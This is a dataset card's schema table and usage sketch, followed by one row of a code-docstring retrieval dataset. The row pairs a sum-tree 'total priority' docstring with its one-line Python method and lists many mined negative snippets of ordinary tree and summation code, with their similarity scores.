| Column | Type | Size / values |
|---|---|---|
| `query` | string | lengths 9 to 3.4k |
| `document` | string | lengths 9 to 87.4k |
| `metadata` | dict | |
| `negatives` | list | lengths 4 to 101 |
| `negative_scores` | list | lengths 4 to 101 |
| `document_score` | string | lengths 3 to 10 |
| `document_rank` | string | 102 distinct values |
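Each row pairs a natural-language query (a docstring) with the code snippet it documents, plus a list of mined negative snippets and their similarity scores; the `metadata` field marks the row for a (query, document, negatives) triplet objective. Below is a minimal usage sketch under the assumption that the dataset is hosted on the Hugging Face Hub; the identifier `user/code-docstring-triplets` is a hypothetical placeholder, not the real dataset path.

```python
# Minimal usage sketch. Assumption: the dataset is on the Hugging Face Hub
# under the hypothetical identifier "user/code-docstring-triplets".
from datasets import load_dataset

ds = load_dataset("user/code-docstring-triplets", split="train")  # hypothetical path

row = ds[0]
query = row["query"]                  # natural-language docstring
positive = row["document"]            # code snippet that matches the query
negatives = row["negatives"]          # 4 to 101 non-matching code snippets
neg_scores = row["negative_scores"]   # one similarity score per negative (may be stored as strings)

# Build (anchor, positive, negative) triplets, hardest negatives first.
ranked = sorted(zip(negatives, neg_scores), key=lambda pair: float(pair[1]), reverse=True)
triplets = [(query, positive, neg) for neg, _ in ranked]
```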
Returns the sum of all priorities stored in this sum tree.
def _total_priority(self): return self.nodes[0]
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def sum(self) -> int:\n return self.root.sum", "def sum(self):\n return sum(self.items())", "def get_sum(self):\n return self.__tree[0]", "def sum(self):\n return sum(self._values.values())", "def total_priority(self) -> int:\n return self.tree[0].item()", "def sum(self):\n return self._summarize(lambda c: c.sum)", "def sum(self):\n return sum(self.values)", "def sum (self):\n return self.values.sum ()", "def sum (self):\n return self.values.sum ()", "def sum(self):\n return self.aggregate(np.sum)", "def sum(self):\n return self._reduce_for_stat_function(F.sum, only_numeric=True)", "def total(self):\n return sum(self.meta) + sum(child.total() for child in self.children)", "def sum(self):\n return self.vsum", "def _sum(self):\n s = 0\n for element, value in self.items():\n s += value\n return s", "def sum(self) -> float:\n return sum(self.values)", "def sum(self):\n import numpy as np\n\n # covering zero-matrices\n if self.child_nodes == {}:\n return self.null_value\n\n def sum_rec(node, offset):\n # making sure the node exists\n if not node:\n return 0\n # checking whether the node is a leaf\n elif node.is_leaf():\n return np.sum(node.dtype.to_mat(node, offset))\n else:\n tmp_result = 0\n # the recursive call\n # checking for the kind of diagram. MTxxx?\n if self.offsets == {}:\n for edge_name in node.child_nodes:\n tmp_result += sum_rec(node.child_nodes[edge_name], node.dtype.to_mat(node, 0, 0))\n # or edge-value dd?\n else:\n for edge_name in node.child_nodes:\n tmp_result += sum_rec(node.child_nodes[edge_name], node.dtype.to_mat(node,\n node.offsets[edge_name],\n offset))\n\n return tmp_result\n\n return sum_rec(self, None)", "def calculate_sum(self):\n\n left_sum = self.left.calculate_sum() if self.left else 0\n right_sum = self.right.calculate_sum() if self.right else 0\n return self.data + left_sum + right_sum", "def total(self):\n return sum(self.d.values())", "def total(self):\n total = sum(self.d.values())\n return total", "def weighted_sum(self):\n return sum(self.wvalues)", "def total_nodes(self)->int:\n\t\tqueue=[]\n\t\tsum=0\n\t\tqueue.append(self)\n\t\twhile(len(queue)>0):\n\t\t\tnode=queue.pop(0)\n\t\t\tsum+=1\n\t\t\tif(node.right!=None):\n\t\t\t\tqueue.append(node.right)\n\t\t\tif(node.left!=None):\n\t\t\t\tqueue.append(node.left)\n\t\treturn sum", "def sum(self):\n return np.dot(self.data.T, self.weights)", "def total(tree):\n if tree is None:\n return 0\n return total(tree.left) + total(tree.right) + tree.cargo", "def n(self):\n return sum(list(self.nodes.values()))", "def sum_tree(t):\n \"*** YOUR CODE HERE ***\"\n if is_leaf(t):\n return entry(t)\n total = entry(t)\n for subtree in subtrees(t):\n total += sum_tree(subtree)\n return total", "def summation(self):\n return sum(self.read_ints())", "def op_sum(self, args):\n sum = 0\n stack_levels = len(self.stack)\n if args != None:\n stack_levels = int(args[0])\n self.require_stack(stack_levels)\n for i in range(0, stack_levels):\n sum += self.stack.pop()\n self.stack.append(sum)", "def get_sum_progress_event(self, event):\n return sum(map(lambda node: node[event], self.values()))", "def sum(self, values):\n return self.aggregate(values, \"sum\")", "def BinaryTreeNodeDepthSum(self, root):\n return self.__binary_tree_node_sum(root)", "def value(self):\n if self.children == tuple():\n return sum(self.meta)\n total = 0\n for meta in self.meta:\n if 0 < meta <= len(self.children):\n total += self.children[meta-1].value()\n return total", "def sum(self):\n # skipna == True\n # only_numerical == True\n # skipna == True\n 
return self._lift(\"sum\")", "def get_sum(self, i):\n s = 0\n\n # index in BITree is 1 more than index in arr[]\n i += 1\n\n # Traverse to leaves of BITree[i]:\n while i > 0:\n s += self.BITree[i]\n\n # Move index to parent node (next set bit in binary representation)\n i -= i & (-i)\n\n return s", "def sumo(self):\n\n return self._sumo", "def compute_node_sums(nodes):\n for node in nodes:\n node.children_summed = 0 # Dynamically add a meta field to Node to improve runtime when computing sums.\n\n leaf_nodes = []\n for node in nodes:\n if len(node.children) == 0:\n leaf_nodes.append(node)\n to_process = leaf_nodes\n while to_process:\n node = to_process.pop()\n # if leaf_node or all child notes computed their sum.\n if len(node.children) == 0 or len(node.children) == node.children_summed:\n node.sum = node.value\n if len(node.children) > 0:\n node.sum = node.sum + sum([child.sum for child in list(node.children.values())])\n if node.parent:\n node.parent.children_summed += 1\n if len(\n node.parent.children) == node.parent.children_summed: # all children have computed their sums\n to_process.append(node.parent)\n\n for node in nodes:\n del node.children_summed", "def get_weights_sum(self):\n return self.w_sum", "def sum_of_nodes(t):\n return label(t) + sum([sum_of_nodes(b) for b in branches(t)])", "def sum(self):\n return sum(self.times)", "def sum(self):\n return sum(self.times)", "def sum(self):\n return sum(self.times)", "def sum_of(self, names):\n vals = self.get_values(names)\n if vals is None:\n return None\n return sum(vals)", "def sumAllValues(self,*toSkip):\n sum=0\n for counterKey in self.counters.keys():\n if not counterKey in toSkip: sum += self.counters[counterKey]\n # 026 #self.debug.mainLogger.debug(\"Sumation of all counters finished with result %i.\"%(sum))\n return sum", "def getValue(self):\n result = 0.0\n for e in self.children:\n result += e.getValue()\n return result", "def sum_values(self):\n raise NotImplementedError", "def get_sum(self, node: Optional[TreeNode]) -> int:\n if not node:\n return 0\n l_sub_sum, r_sub_sum = self.get_sum(node.left), self.get_sum(node.right)\n self.ans += abs(l_sub_sum - r_sub_sum)\n\n return node.val + l_sub_sum + r_sub_sum", "def minimum_path_sum(self, root) -> int:\n\n def minimum_path_sum_aux(root, path=None):\n path.append(root.value)\n new_path = path[:]\n\n # Stop condition\n if root.is_leaf():\n return\n else:\n if root.left is not None:\n minimum_path_sum_aux(root.left, path=path)\n elif root.right is not None:\n minimum_path_sum_aux(root.right, path=path)\n\n if root.right is not None and root.left is not None:\n paths.append(new_path)\n minimum_path_sum_aux(root.right, path=new_path)\n\n paths = [[]]\n\n minimum_path_sum_aux(root, path=paths[0])\n return min([sum(path) for path in paths])", "def find_level_maxsum (self):\r\n level_queue = [self]\r\n next_level_queue = []\r\n curr_level = 0\r\n max_sum = -sys.maxsize\r\n while level_queue:\r\n curr_node = level_queue.pop(0)\r\n if curr_node.left:\r\n next_level_queue.append(curr_node.left)\r\n if curr_node.right:\r\n next_level_queue.append(curr_node.right)\r\n if not level_queue:\r\n sum_value = 0\r\n for nodes in next_level_queue:\r\n sum_value += nodes.root\r\n if sum_value > max_sum:\r\n max_sum = sum_value\r\n curr_level += 1\r\n level_queue = next_level_queue[:]\r\n next_level_queue = []\r\n if self.root> max_sum:\r\n max_sum = self.root\r\n return max_sum", "def cumsum(self):\n return self._lift(lambda c: c.cumsum)", "def total(self):\n gd_total = self._grand_total()\n 
counts = self._get_as_dict_count()\n for rule in self.rules:\n gd_total += rule(counts)\n return gd_total", "def sum(self, flow=False):\n return self._hist.sum(flow)", "def totalCount(self):\n return sum(self.values())", "def totalCount(self):\n return sum(self.values())", "def totalCount(self):\n return sum(self.values())", "def __binary_tree_node_sum(self, root, depth=0, node_type=None):\n if root == None:\n return self.node_sum\n multiplication_factor = 1\n if node_type == \"left\" and depth % 2 == 0:\n multiplication_factor = 2\n self.node_sum += depth * multiplication_factor\n self.__binary_tree_node_sum(root.left, depth=depth+1, node_type=\"left\")\n self.__binary_tree_node_sum(root.right, depth= depth+1, node_type=\"right\")\n return self.node_sum", "def wsum(self):\n return reduce(operator.add, self.wvalues, 0.0)", "def grand_total(self):\n return sum(self.grid[pos][1] for pos in assignable_positions if self.grid[pos][0]) + self.grid[\"nb\"][1]", "def sum(self, start=0, end=None):\n return super(SumSegmentTree, self).reduce(start, end)", "def sum(self, start=0, end=None):\n return super(SumSegmentTree, self).reduce(start, end)", "def sum(self, start=0, end=None):\n return super(SumSegmentTree, self).reduce(start, end)", "def sum(self, start=0, end=None):\n return super(SumSegmentTree, self).reduce(start, end)", "def sum(self, start=0, end=None):\n return super(SumSegmentTree, self).reduce(start, end)", "def total_qty(self):\n return sum(self.quantities)", "def get_all_edges(self):\n sum = 0\n for vertex in self:\n sum += vertex.get_edges()\n return sum", "def sum(self):\n total = 0\n for el in self.__list:\n if type(el) is int or type(el) is float:\n total += el\n elif not el:\n continue\n else:\n total += len(el)\n return total", "def totalValue(self):\n\n\t\tvalue = 0\n\t\tfor bottle in self.bottles:\n\t\t\tvalue += bottle.inflatedCost\n\n\t\treturn value", "def logp_sum(self, *args, **kwargs):\n ## CHANGED\n #return tt.sum(self.logp(*args, **kwargs))\n return S.tsum(self.logp(*args, **kwargs))", "def getScore(self):\n return sum(self.field)", "def probOfAllNodeObservations( self ):\n aLeaf = list( self._hyperGraph.leaves )[ 0 ]\n\n total = LogVar( 0 )\n for i in range( aLeaf.N ):\n _u = aLeaf.getFullJoint( i )\n total += _u\n return total", "def calcularTotal(self):\n subtotales=[]\n for row in range(0,self.tableNC.rowCount()):\n subtotales.append(float(self.tableNC.item(row,2).text()))\n return sum(subtotales)", "def number_total(self):\n return sum(self.grid[pos][1] for pos in [\"n1\", \"n2\", \"n3\", \"n4\", \"n5\", \"n6\"] if self.grid[pos][0])", "def total_score(self):\n return _projected_site_total_score(self)", "def _prefix_sum(self, i: int) -> int:\n pref_sum = 0\n while i > 0:\n pref_sum += self.tree[i]\n i &= ~self._lsb(i) # Equivalent to i -= _lsb(i)\n \n return pref_sum", "def calculate_sum_of_all_attributes(self):\n\n sum = 0\n\n for key, val in self.__dict__.items():\n\n if isinstance(val, (int, float)):\n sum += val\n\n return sum", "def sum(self):\n\n return time_stat(self, stat=\"sum\")", "def total_cost(self):\r\n return sum(i.line_cost for i in self.orderitem_set.filter(status=self.status)) # pylint: disable=E1101\r", "def rowsums (self):\n return self.values.sum (axis=0)", "def sum(self):\n if self.isscalar():\n s = self.defval\n else:\n if self.defval:\n msg = \"Sum of a tensor wish defval != 0 not implemented.\"\n raise NotImplementedError(msg)\n s = 0\n for v in self.sects.values():\n s += np.sum(v)\n return s", "def sum_points(self) -> int:\n return 
sum([card.rank_value for card in self.deck.cards])", "def cost(self):\n node, path_back = self, []\n cost = 0\n while node:\n path_back.append(node)\n if node.action is not None:\n cost = cost + node.action.cost\n node = node.parent\n # remove one due to root empty node \n #cost = cost-1\n return [cost, list(reversed(path_back))]", "def sum_of_tree(root_elem):\r\n\tif root_elem is None:\r\n\t\treturn 0\r\n\treturn root_elem.value + sum_of_tree(root_elem.left) + sum_of_tree(root_elem.right)", "def sumSet(weightedSet):\n\tsum = 0\n\tfor example in weightedSet:\n\t\tsum += example.weight\n\treturn sum", "def total_value(self):\n return self.parent.child_total_value[self.action]", "def _get_sum(self):\r\n try:\r\n return self._sum\r\n except AttributeError:\r\n self._sum = self.no_nan.sum()\r\n # The following 2 lines are needede as in Python 3.3 with NumPy\r\n # 1.7.1, numpy.ndarray and numpy.memmap aren't hashable.\r\n if type(self._sum) is numpy.memmap:\r\n self._sum = numpy.asarray(self._sum).item()\r\n if self.has_nan and self.no_nan.mask.all():\r\n # In this case the sum is not properly computed by numpy.\r\n self._sum = 0\r\n if numpy.isinf(self._sum) or numpy.isnan(self._sum):\r\n # NaN may happen when there are both -inf and +inf values.\r\n if self.has_nan:\r\n # Filter both NaN and Inf values.\r\n mask = self.no_nan.mask + numpy.isinf(self[1])\r\n else:\r\n # Filter only Inf values.\r\n mask = numpy.isinf(self[1])\r\n if mask.all():\r\n self._sum = 0\r\n else:\r\n self._sum = numpy.ma.masked_array(self[1], mask).sum()\r\n # At this point there should be no more NaN.\r\n assert not numpy.isnan(self._sum)\r\n return self._sum", "def n(self):\n return sum(self._comp.values())", "def total_reward(self):\n return np.sum(self.rewards)", "def __puntuacion_total(self):\n disparos = []\n for disparo in self.__disparos:\n total = 0\n for puntaje in disparo['disparos']:\n total += puntaje\n disparo['puntaje_total'] = total\n disparos.append(disparo)\n return disparos", "def prob_sum(graph, key):\n return sum(edge_prob(graph, edge, True) for edge in key)", "def sum_node_list(node_list):\r\n from operator import add\r\n from functools import reduce\r\n return reduce(add, node_list)", "def sum_rating(self):\n return self.get_queryset().aggregate(Sum('vote')).get('vote__sum') or 0", "def sum_node_list(node_list):\n from operator import add\n from functools import reduce\n return reduce(add, node_list)", "def _calculate_weights(curr_level, edge_sum):\n curr_level_weights = {n: 1 for n in curr_level}\n for curr_node in edge_sum:\n curr_level_weights[curr_node] += edge_sum[curr_node]\n return curr_level_weights", "def priority(self):\n return self._pri", "def mlp_weight_sum(self) -> Tuple[Tensor, Tensor]:\n if self._model:\n return self._model.mlp_weight_sum()\n return torch.tensor([0.0]), torch.tensor([0.0])", "def SumTotalCost():\n\n logs.logger.debug(\"Start to add all amount of Cost objects.\")\n try:\n sumTotal = 0\n for item in GetAllAmountOfCost():\n sumTotal += item\n logs.logger.info(\"Add all amount of Cost objects.\")\n return sumTotal\n except Exception as e:\n logs.logger.error(e, exc_info=True)", "def update_priority(self, indexes, values):\n values = values * 10000\n values = self._clip_p(values)\n values = int(values)\n self.sum_tree.update(indexes, values)", "def with_sum_sum_reduction(self):\n return self.with_reduction(lambda x: x.sum())", "def get_total_assigned(self):\n return sum(self.n_assigned_list)", "def tc(self):\n return np.sum(self.tcs)", "def score(self, tree):\n probas 
= [self.prod_freq.get(prod, 0.5) /\n self.source_freq.get(prod.source, 1)\n for prod in tree]\n logger.debug(\"Scoring {0}:\".format(tree))\n for prod, proba in zip(tree, probas):\n logger.debug(\n \"\\t- {0} {1}({2})\"\n .format(prod, round(proba, 3), round(log(proba, 10), 3)))\n log_proba = sum(log(proba, 10) for proba in probas)\n return {\n 'log_proba': log_proba,\n 'productions': len(probas)\n }", "def get_total_redeem(self):\n total = 0\n for redeem in self.get_redeems():\n total += redeem.get_total()\n return total" ]
[ "0.6984377", "0.67695606", "0.67609626", "0.6698405", "0.6667603", "0.6662966", "0.66467816", "0.66216046", "0.66216046", "0.65775466", "0.6440943", "0.6387141", "0.635604", "0.6329519", "0.63249815", "0.6249568", "0.61827457", "0.6161957", "0.61138844", "0.6100439", "0.6093953", "0.60443217", "0.6023509", "0.5953569", "0.5916209", "0.58830446", "0.58670497", "0.5861232", "0.5834539", "0.5794486", "0.5753008", "0.57492274", "0.57482564", "0.5733829", "0.57316864", "0.57234776", "0.5712779", "0.5691289", "0.5691289", "0.5691289", "0.56727785", "0.56599355", "0.56383795", "0.56267166", "0.5622123", "0.5590967", "0.5563677", "0.5563247", "0.55527186", "0.5548702", "0.5547159", "0.5547159", "0.5547159", "0.55431604", "0.55221766", "0.5520411", "0.551625", "0.551625", "0.551625", "0.551625", "0.551625", "0.5485707", "0.5484552", "0.5472757", "0.5470407", "0.54533595", "0.5443762", "0.5428021", "0.54051423", "0.54026175", "0.5399512", "0.53663146", "0.5363358", "0.5350568", "0.5349872", "0.5344437", "0.53439915", "0.53229207", "0.53188586", "0.53181136", "0.5309418", "0.52910894", "0.5276108", "0.52696973", "0.5263087", "0.52563745", "0.5218554", "0.52162385", "0.520819", "0.5191034", "0.51792353", "0.51755023", "0.5161991", "0.51579523", "0.5154866", "0.5150504", "0.5148262", "0.51457447", "0.51349735", "0.5131171" ]
0.65628356
10
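The record above retrieves a one-line `_total_priority` that simply reads `self.nodes[0]`. For context, here is a minimal sketch of the array-backed sum tree that such a one-liner relies on; the class and method names are illustrative, not the original library's implementation. Leaves store per-item priorities, every internal node stores the sum of its two children, so the root at index 0 always equals the total priority.

```python
import numpy as np

class FlatSumTree:
    """Illustrative array-backed sum tree: node i has children 2i+1 and 2i+2,
    the last `capacity` slots are leaves, and every internal node stores the
    sum of its children, so nodes[0] is always the total priority."""

    def __init__(self, capacity):
        self.capacity = capacity
        self.low_idx = capacity - 1             # index of the first leaf
        self.nodes = np.zeros(2 * capacity - 1)

    def set_priority(self, item, priority):
        idx = self.low_idx + item
        delta = priority - self.nodes[idx]
        while idx >= 0:                         # propagate the change up to the root
            self.nodes[idx] += delta
            idx = (idx - 1) // 2 if idx > 0 else -1

    def _total_priority(self):
        return self.nodes[0]                    # root = sum of all leaf priorities

tree = FlatSumTree(4)
for item, priority in enumerate([1.0, 2.0, 3.0, 4.0]):
    tree.set_priority(item, priority)
assert tree._total_priority() == 10.0
```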
Samples an element from the sum tree.
def sample(self, rng, query_value=None): nodes = jnp.array(self.nodes) query_value = ( jax.random.uniform(rng) if query_value is None else query_value) query_value *= self._total_priority() _, index, _ = jax.lax.fori_loop(0, self.depth, step, (query_value, 0, nodes)) return np.minimum(index - self.low_idx, self.highest_set)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def sample(self):\n return self._root.sample()", "def sample(self) -> None:\n with self._samples_lock:\n if self.element_sampler.has_element:\n self._samples.append(self.element_sampler.el)\n self.element_sampler.has_element = False", "def sample(self, x):", "def sample(self):\n raise NotImplementedError", "def sample(self):\n raise NotImplementedError", "def sample(self, observation):\n raise NotImplementedError", "def sample(self, bqm, **parameters):\n return self.child.sample(bqm, **parameters)", "def sample_one(self):\n # x = self.mean + self.sigma * np.random.normal()\n x = self.dist.sample(1)\n return x", "def sample(self):\r\n raise NotImplementedError", "def sample(self, my_sample):\n with self.sample_lock:\n self.sum_ += my_sample\n if my_sample > self.max_sample:\n self.max_sample = my_sample\n if my_sample < self.min_sample:\n self.min_sample = my_sample\n self.count += 1", "def stratified_sample(self, batch_size, rng):\n if self._total_priority() == 0.0:\n raise Exception('Cannot sample from an empty sum tree.')\n\n indices = parallel_stratified_sample(rng, self.nodes, np.arange(batch_size),\n batch_size, self.depth)\n return np.minimum(indices - self.low_idx, self.highest_set)", "def sample(self):", "def sample(self, n):\n raise NotImplementedError", "def sample(self, point, n_samples=1):\n raise NotImplementedError(\"The sample method is not yet implemented.\")", "def test_score_with_sample_weights():\n atom = ATOMClassifier(X_bin, y_bin, random_state=1)\n atom.run(\"Tree\")\n score = atom.tree.score(X_bin, y_bin, sample_weight=list(range(len(y_bin))))\n assert isinstance(score, np.float64)", "def easy_sample(self, num, **kwargs):\n return self.preprocess(self.sample(num, **kwargs), **kwargs)", "def sample(self, size=1):\n pass", "def sample(self):\n return self._sample_func", "def samples(self, u=None):\n roots = [u]\n if u is None:\n roots = self.roots\n for root in roots:\n yield from self._sample_generator(root)", "def sample(self, n=1):\n raise NotImplementedError", "def sample(self, seed=None):\n raise NotImplementedError()", "def sample(self,p0=None,nsamp=None): \r\n raise NotImplementedError('Need to implement sample function')", "def sample(self):\n raise NotImplementedError(\"Override me!\")", "def sample(self, size=1):\n raise NotImplementedError", "def sample(self, size=1):\n raise NotImplementedError", "def sample(self, size=1):\n raise NotImplementedError", "def sample(self, size=1):\n raise NotImplementedError", "def sample(self, sample_shape=t.Size(), avg=True):\n with t.no_grad():\n return self.rsample(sample_shape, avg)", "def sample(self):\n sampleIndices = self.random_state.choice(len(self.X), int(len(self.X)*self.sample_ratio), replace=False)\n\n return self.X[sampleIndices]\n pass", "def sample(self, root, tree, sample_num, for_d):\n\n # all_score = self.sess.run(self.generator.all_score)\n # all_score is a matrix with shape [n_node, n_node]\n all_score = self.generator.all_score\n samples = []\n paths = []\n n = 0\n\n while len(samples) < sample_num:\n current_node = root\n previous_node = -1\n paths.append([])\n is_root = True\n paths[n].append(current_node)\n while True:\n node_neighbor = tree[current_node][1:] if is_root else tree[current_node]\n # print(\"////\", tree[current_node])\n is_root = False\n if len(node_neighbor) == 0: # the tree only has a root\n return None, None\n if for_d: # skip 1-hop nodes (positive samples)\n if node_neighbor == [root]:\n # in current version, None is returned for simplicity\n return None, None\n if root in 
node_neighbor:\n node_neighbor.remove(root)\n\n # we retrieve embeddings corresponding to current node's neighbors\n # the multiply of g_v with shape (1, 50) and g_vi with shape(1, 50) is a scala\n # to calculate the multiply of g_v and g_vi: we calculate the \"multiplication\" (inner product) between embedding_matrix with shape(n_node, 50) and its transpose\n # then saved the result in self.score with shape (n_node, n_node) in dis_torch.py\n # all_score has the shape = (5254, 5254), each row is a list of scala, each scala is the \"multiplication\" (inner product) between a particular node to an other node in the graph\n # due to for each current_node, we have a list of its neighbors, saved in [node_neighbor]\n # we can retrieve a list of scalas that equal to the \"multiplications\" (inner product) between g_v(current node) to its neighbor g_vi\n # to do that, we have:\n relevance_probability = all_score[current_node][node_neighbor]\n\n # convert tensor to numpy array\n relevance_probability = relevance_probability.cpu().detach().numpy()\n\n # finally, applying softmax function, we get the relevance probability of current_node and its neighbors, as formed in the paper\n relevance_probability = utils.softmax(relevance_probability)\n \n # pick a random node from its neighbors based on relevance_probability\n next_node = np.random.choice(node_neighbor, size=1, p=relevance_probability)[0] # select next node\n # print(\"???\", next_node)\n paths[n].append(next_node)\n if next_node == previous_node: # terminating condition\n samples.append(current_node)\n break\n previous_node = current_node\n current_node = next_node\n n = n + 1 # n equal to sample_num\n return samples, paths # for each sample, we get one path from root to that sample", "def sample(self, k):\n result = \"\"\n current = self.gen_beginning()\n for i in range(0, k):\n result += current[0] + \" \"\n t = tuple(current)\n if t in self.dict:\n c_sum = self.dict[t][self.sum_index]\n rand = random.randint(0, c_sum)\n new_term = \"\"\n for term, count in self.dict.iteritems():\n if rand > count:\n rand -= count\n else:\n new_term = term\n break\n current.remove(current[0])\n current.append(new_term)\n else:\n current = self.gen_beginning()\n return result", "def sample(self, batch_size):\n\n if self.tree.filled_size() < batch_size:\n return None, None, None\n\n out = []\n indices = []\n weights = []\n priorities = []\n i = 0\n while i < batch_size:\n r = random.random()\n data, priority, index = self.tree.find(r)\n if not data:\n continue\n priorities.append(priority)\n weights.append((1. 
/ self.capacity / priority) ** self.beta if priority > 1e-16 else 0)\n indices.append(index)\n out.append(data)\n self.priority_update([index], [0]) # To avoid duplicating\n i += 1\n\n self.priority_update(indices, priorities) # Revert priorities\n\n weights = [w / max(weights) for w in weights] # Normalize for stability\n\n return out, weights, indices", "def sample(self, pkg):\n return next(self.dist[pkg])", "def _sample(self, geometry: Geometry) -> math.Tensor:\n raise NotImplementedError(self)", "def sample(self, x: Union[np.ndarray, float, list]) -> float:\n return np.exp(self.log_sample(x))", "def sample(self, nsamples):\n return self.dist.sample(nsamples)", "def sampleWeight(self):\r\n x=random.random()\r\n i = 0\r\n n = len(self.weights)-1\r\n cummulativeWeight = 0\r\n #Distribute the exploration weight evenly among all the actions that have been\r\n #taken up to this point in time by any of the users\r\n if len(self.sampledActions) == 0:\r\n explorationWeight = 0\r\n else:\r\n explorationWeight = self.explorationFund / len(self.sampledActions)\r\n #Compute the normalization factor. If no action has been sampled by this user yet,\r\n #then each action k has weight eta*pi_k, where pi_k is the weight of k in the\r\n #prior distribution. Then, the normalization factor is the sum(eta*pi_k) for all k,\r\n #which is equal to eta*sum(pi_k), which is just eta, since the sum of the previous\r\n #weights has to add up to 1.\r\n #If one or more actions have been already sampled, the normalization factor is the\r\n #sum of 1) the weights already in self.weights, 2) the exploration fund, and 3) the\r\n #weights of the actions that are not yet in self.weights. Each one of these actions\r\n #has weight eta*pi_k (because it hasn't been sampled yet), so the total weight of the\r\n #mass of actions not yet in self.weights is eta*(1-sum(pi_l)), where the sum is over all\r\n #the weights already in self.weights\r\n if n < 0:\r\n normalizationFactor = self.priorBelief\r\n else:\r\n normalizationFactor = sum(self.weights) + self.explorationFund + \\\r\n self.priorBelief*(1-self.priorTopicDistr.cummulative[n])\r\n #Keep getting the next weight until the combined mass of the weights is less than the\r\n #random number x\r\n while True:\r\n w = self.__getitem__(i)\r\n if i in self.sampledActions:\r\n w += explorationWeight\r\n cummulativeWeight += w\r\n if x <= cummulativeWeight/normalizationFactor:\r\n if i not in self.sampledActions:\r\n self.sampledActions.append(i)\r\n return w\r\n i += 1", "def get_unit_element(group, component):\n return group.random(component) ** 0", "def sample(self, shape):\n\t\traise NotImplementedError()", "def sample(self, Z=None):\n Z = Z if Z is not None else self.sum() # normalize if desired / by default\n assert (Z > 0), 'Non-normalizable factor (perhaps log factor?)' # also check for positivity?\n pSoFar = 0.0\n pDraw = Z * np.random.random_sample()\n it = np.nditer(self.t, op_flags=['readonly'], flags=['multi_index']) # for tuple return\n #it = np.nditer(self.t, op_flags=['readonly'], flags=[orderMethod+'_index']) # for index return\n while not it.finished:\n pSoFar += it[0]\n if ( pSoFar > pDraw ):\n return it.multi_index # multi_index for tuple return\n #return it.index # index for index return\n it.iternext()\n return self.v.ind2sub(self.numel()-1) # if numerical issue: return final state", "def sample(self, num_samples, **kwargs):\n pass", "def addsample(self):\n if self.nsample >= len(self.samples):\n raise Exception(\"Max number of samples reached\")\n\n 
self.samples[self.nsample] = self.current()\n self.nsample += 1", "def sample(pi, sigma, mu):\n # print(\"sample: pi:\", pi.size(), pi)\n categorical = Categorical(pi)\n pis = list(categorical.sample().data)\n sample = Variable(sigma.data.new(sigma.size(0), sigma.size(2)).normal_())\n for i, idx in enumerate(pis):\n sample[i] = sample[i].mul(sigma[i,idx]).add(mu[i,idx])\n return sample", "def process_sample(self, value: PhyPropType) -> PhyPropType:\n pass", "def get_subsample_of_nodes(g, sampl=1):\n return sample(g.nodes(), int(len(g.nodes())*sampl))", "def regular_subsample(neuron):\n # select all the main points\n selected_index = get_main_points(neuorn)\n\n # Computing the parent id of the selected nodes\n neuron = neuron_with_selected_nodes(selected_index)\n return neuron", "def sample(self):\n return self._action_out(self._env.action_space.sample())", "def get_next_sample(self):", "def sample_from_unit_ball(rng, dim):\n vec = rng.randn(dim)\n return vec / np.sqrt(np.sum(vec**2))", "def sample(self):\n x = self.state\n# dx = self.theta * (self.mu - x) + self.sigma * np.array([random.random() for i in range(len(x))])\n dx = self.theta * (self.mu - x) + self.sigma * np.random.standard_normal(self.size)\n self.state = x + dx\n return self.state", "def sample(self, context: Context) -> T:\n ...", "def __call__(self, params):\r\n return self.sample(params)", "def __add__(self,sample):\n self.add(sample)", "def sample(self, num_samples = 1):\n\n # shortcut\n shape = self.shape\n loc = self.loc\n scale = self.scale\n\n # some sampling\n U = self.UG.sample(num_samples)\n X = 1 / scale * (-np.log(U)) ** (1 / shape)\n return scale * X + loc", "def sample(self, seg_logit, seg_label):", "def sample(self, size=None):\n return self.obj_", "def sample(tree, i, alpha=0.5, beta=0.5, only_tree=True):\n # for n in tree.nodes():\n # lab = tuple(n)\n # if len(n) == 1:\n # lab = \"(\" + str(list(n)[0]) + \")\"\n # tree.node[n] = {\"color\": \"black\", \"label\": lab}\n # print tree.nodes()\n\n if only_tree is True:\n tree_new = tree # Alter the input tree\n else:\n #tree_new = tree.subgraph(tree.nodes()) # nx < 2.0\n tree_new = tree.copy() # nx < 2.0\n\n #print(nocopy)\n #old_G = trilearn.graph.junction_tree.get_graph(tree)\n #(subtree, old_separators, probtree) = glib.random_subtree(tree, alpha, beta)\n\n # plotGraph(subtree, directory+\"subtree_\"+str(i)+\".eps\")\n # for n in subtree.nodes():\n # tree_old.node[n] = {\"color\": \"blue\", \"label\": tuple(n)}\n # if n in tree.nodes():\n # tree.node[n] = {\"color\": \"blue\", \"label\": tuple(n)}\n\n # plotGraph(tree_old.subgraph(tree_old.nodes()),\n # directory + \"tree(\" + str(i-1) + \")p.eps\")\n\n (_, subtree_nodes, subtree_edges, subtree_adjlist,\n old_separators, prob_subtree) = ss.random_subtree(tree, alpha, beta, i)\n\n (old_cliques,\n new_cliques,\n new_separators,\n P,\n neig) = sample_cond_on_subtree_nodes(i, tree_new, subtree_nodes, subtree_edges, subtree_adjlist)\n\n if only_tree is True:\n return tree_new\n #conn_nodes = set()\n #for clique in new_cliques:\n # conn_nodes |= clique\n\n # for n in tree.nodes():\n # lab = tuple(n)\n # if len(n) == 1:\n # lab = \"(\"+str(list(n)[0])+\")\"\n # if n in new_cliques:\n # tree.node[n] = {\"color\": \"red\", \"label\": lab}\n # plotGraph(tree.subgraph(tree.nodes()), directory+\"tree(\"+str(i)+\").eps\")\n\n #G = trilearn.graph.junction_tree.get_graph(tree)\n # G.node[i] = {\"color\": \"red\"}\n # for n in old_G:\n # if n in conn_nodes:\n # old_G.node[n] = {\"color\": \"blue\"}\n # G.node[n] = 
